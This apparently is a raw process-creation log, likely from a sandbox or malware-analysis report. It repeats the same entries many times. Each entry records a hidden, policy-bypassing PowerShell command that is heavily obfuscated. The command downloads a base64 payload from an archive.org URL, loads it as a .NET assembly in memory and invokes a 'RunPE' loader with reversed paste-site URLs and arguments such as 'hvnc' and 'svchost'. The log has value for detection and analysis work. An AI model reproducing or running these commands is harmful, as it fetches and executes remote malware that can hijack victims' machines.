([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\conhost.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
